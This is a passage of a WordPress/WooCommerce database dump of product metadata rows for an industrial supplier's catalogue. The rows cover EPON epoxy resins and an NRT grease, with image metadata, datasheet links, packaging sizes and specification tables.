INSERT INTO `wp_postmeta` VALUES (8750, 882, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8751, 882, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8752, 882, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8753, 882, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8754, 882, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8755, 882, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8756, 882, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8757, 882, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8758, 882, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8759, 882, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8760, 882, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8761, 882, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8762, 882, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8763, 882, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8764, 882, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8765, 882, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8766, 882, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8767, 882, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8768, 882, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8769, 882, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8770, 882, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8771, 882, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8772, 882, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8773, 882, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8774, 882, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8775, 882, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8776, 882, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8777, 882, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8778, 882, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (8779, 884, '_wp_attached_file', '2016/08/Epon-unmodified-epoxy.jpg'); 
INSERT INTO `wp_postmeta` VALUES (8780, 884, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4752;s:6:"height";i:3168;s:4:"file";s:33:"2016/08/Epon-unmodified-epoxy.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"Epon-unmodified-epoxy-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"Epon-unmodified-epoxy-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"Epon-unmodified-epoxy-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"Epon-unmodified-epoxy-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"Epon-unmodified-epoxy-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"Epon-unmodified-epoxy-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"Epon-unmodified-epoxy-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"Epon-unmodified-epoxy-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8781, 885, '_edit_lock', '1474469373:2'); 
INSERT INTO `wp_postmeta` VALUES (8782, 885, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (8783, 886, '_wp_attached_file', '2016/08/834.pdf'); 
INSERT INTO `wp_postmeta` VALUES (8784, 885, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8785, 885, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8786, 885, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8787, 885, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8788, 885, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8789, 885, '318_custom_list_file', 'a:2:{s:32:"0e6bf8e3c0e602c37bd5fbfa9c48fcef";a:3:{s:4:"name";s:9:"EPON 8304";s:4:"file";s:68:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/834.pdf";s:4:"desc";s:12:"EPON 834 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (8790, 885, '317_default_editor', 'Pint, quart, gallon, 5 gallon. 55 gallon drum.'); 
INSERT INTO `wp_postmeta` VALUES (8791, 885, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8792, 885, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8793, 885, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8794, 885, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8795, 885, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8796, 885, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8797, 885, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8798, 885, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8799, 885, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8800, 885, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8801, 885, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8802, 885, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8803, 885, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8804, 885, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8805, 885, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8806, 885, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8807, 885, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8808, 885, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8809, 885, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8810, 885, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8811, 885, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8812, 885, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8813, 885, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8814, 885, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8815, 885, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8816, 885, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8817, 885, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8818, 885, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8819, 885, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (8820, 887, '_edit_lock', '1479929456:3'); 
INSERT INTO `wp_postmeta` VALUES (8821, 887, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (8822, 888, '_edit_lock', '1475507541:2'); 
INSERT INTO `wp_postmeta` VALUES (8823, 888, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (8824, 889, '_wp_attached_file', '2016/08/862.pdf'); 
INSERT INTO `wp_postmeta` VALUES (8825, 887, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8826, 887, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8827, 887, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8828, 887, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8829, 887, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8830, 887, '318_custom_list_file', 'a:2:{s:32:"d90c2855f226d6c932bc196efb69d0a5";a:3:{s:4:"name";s:8:"EPON 862";s:4:"file";s:68:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/862.pdf";s:4:"desc";s:12:"EPON 862 TDS";}s:32:"72a2e7d2ac5eab9425250c0cb021f827";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (8831, 887, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8832, 887, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8833, 887, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8834, 887, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8835, 887, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8836, 887, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8837, 887, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8838, 887, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8839, 887, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8840, 887, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8841, 887, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8842, 887, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8843, 887, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8844, 887, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8845, 887, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8846, 887, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8847, 887, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8848, 887, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8849, 887, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8850, 887, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8851, 887, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8852, 887, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8853, 887, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8854, 887, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8855, 887, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8856, 887, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8857, 887, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8858, 887, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8859, 887, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8860, 887, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (8861, 888, '_thumbnail_id', '874'); 
INSERT INTO `wp_postmeta` VALUES (8862, 890, '_wp_attached_file', '2016/08/EPON-modified-epoxy.jpg'); 
INSERT INTO `wp_postmeta` VALUES (8863, 890, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3648;s:6:"height";i:5472;s:4:"file";s:31:"2016/08/EPON-modified-epoxy.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"EPON-modified-epoxy-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"EPON-modified-epoxy-533x800.jpg";s:5:"width";i:533;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"EPON-modified-epoxy-768x1152.jpg";s:5:"width";i:768;s:6:"height";i:1152;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"EPON-modified-epoxy-1067x1600.jpg";s:5:"width";i:1067;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"EPON-modified-epoxy-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"EPON-modified-epoxy-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"EPON-modified-epoxy-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"EPON-modified-epoxy-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8864, 891, '_edit_lock', '1479929366:3'); 
INSERT INTO `wp_postmeta` VALUES (8865, 891, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (8866, 888, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8867, 888, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8868, 888, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224"><strong>NRT PLSS</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Estimated Temperature Range</strong></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><strong>°C</strong></td>\r\n<td style="text-align: center;">-36-260</td>\r\n</tr>\r\n<tr>\r\n<td><strong>°F</strong></td>\r\n<td style="text-align: center;">-33-500</td>\r\n</tr>\r\n<tr>\r\n<td><strong>NLGI Grade</strong></td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Specific Gravity</strong></td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td><strong>ISO Viscosity</strong></td>\r\n<td style="text-align: center;">240</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8869, 888, '716_default_editor', '<ul>\r\n 	<li>Valves</li>\r\n 	<li>Regulators</li>\r\n 	<li>Pumps</li>\r\n 	<li>Bearings</li>\r\n 	<li>Motor Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Compressors</li>\r\n 	<li>Turbine Generators</li>\r\n 	<li>Automotive Components</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8870, 888, '719_default_editor', '<ul>\r\n 	<li>NSF H-1</li>\r\n 	<li>BAM</li>\r\n 	<li>BOC</li>\r\n 	<li>Air Liquide</li>\r\n 	<li>NASA</li>\r\n 	<li>General Dynamics</li>\r\n 	<li>Praxair</li>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D972</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8871, 888, '318_custom_list_file', 'a:1:{s:32:"b3d98ce2cb95a3204674aa4d78f511e0";a:3:{s:4:"name";s:7:"NRT SDS";s:4:"file";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/NRTgrease.pdf";s:4:"desc";s:17:"Safety Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (8872, 888, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8873, 888, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8874, 888, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8875, 888, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8876, 888, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8877, 888, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8878, 888, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8879, 888, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8880, 888, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8881, 888, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8882, 888, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8883, 888, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8884, 888, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8885, 888, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8886, 888, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8887, 888, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8888, 888, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8889, 888, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8890, 888, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8891, 888, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8892, 888, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8893, 888, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8894, 888, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8895, 888, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8896, 888, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8897, 888, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8898, 888, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8899, 888, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8900, 888, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8901, 888, '_product_image_gallery', '378,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (8902, 892, '_wp_attached_file', '2016/08/shutterstock_386837776.jpg'); 
INSERT INTO `wp_postmeta` VALUES (8903, 892, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4684;s:6:"height";i:3157;s:4:"file";s:34:"2016/08/shutterstock_386837776.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_386837776-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_386837776-800x539.jpg";s:5:"width";i:800;s:6:"height";i:539;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_386837776-768x518.jpg";s:5:"width";i:768;s:6:"height";i:518;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_386837776-1600x1078.jpg";s:5:"width";i:1600;s:6:"height";i:1078;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_386837776-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_386837776-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_386837776-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_386837776-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:67;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8904, 893, '_wp_attached_file', '2016/08/8280.pdf'); 
INSERT INTO `wp_postmeta` VALUES (8905, 891, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8906, 891, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8907, 891, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8908, 891, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8909, 891, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8910, 891, '318_custom_list_file', 'a:2:{s:32:"8821eb7d8188a547224b75cb863c47cc";a:3:{s:4:"name";s:9:"EPON 8280";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/8280.pdf";s:4:"desc";s:13:"EPON 8280 TDS";}s:32:"72a2e7d2ac5eab9425250c0cb021f827";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (8911, 891, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8912, 891, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8913, 891, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8914, 891, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8915, 891, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8916, 891, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8917, 891, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8918, 891, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8919, 891, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8920, 891, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8921, 891, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8922, 891, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8923, 891, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8924, 891, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8925, 891, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8926, 891, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8927, 891, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8928, 891, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8929, 891, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8930, 891, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8931, 891, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8932, 891, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8933, 891, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8934, 891, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8935, 891, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8936, 891, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8937, 891, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8938, 891, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8939, 891, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8940, 891, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (8941, 882, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (8942, 894, '_wp_attached_file', '2016/08/release1-e1472229931134.jpeg'); 
INSERT INTO `wp_postmeta` VALUES (8943, 894, '_wp_attachment_metadata', 